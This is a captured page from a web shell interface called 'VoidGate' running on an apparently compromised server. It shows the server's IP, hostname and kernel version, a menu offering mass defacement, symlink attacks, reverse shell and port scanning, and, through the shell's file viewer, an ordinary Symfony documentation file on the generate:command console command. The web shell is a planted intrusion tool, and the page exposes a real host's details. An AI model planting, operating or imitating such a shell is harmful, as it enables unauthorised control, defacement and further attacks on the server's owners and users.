ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
sensio
/
generator-bundle
/
Resources
/
doc
/
commands
/
Viewing: generate_command.rst
Generating a New Command ======================== .. caution:: If your application is based on Symfony 2.x version, replace ``php bin/console`` with ``php app/console`` before executing any of the console commands included in this article. Usage ----- The ``generate:command`` command generates a new Command class for the given console command. By default the command is run in the interactive mode and asks questions to determine the bundle and the command name: .. code-block:: bash $ php bin/console generate:command The command can be run in a non interactive mode by using the ``--no-interaction`` and providing the needed arguments: .. code-block:: bash $ php bin/console generate:command --no-interaction AcmeBlogBundle blog:publish-posts Available Arguments ------------------- * ``bundle``: The name of the bundle where the command class is generated. * ``name``: The name of the command as you type it in the console.
Coded With 💗 by
0x6ick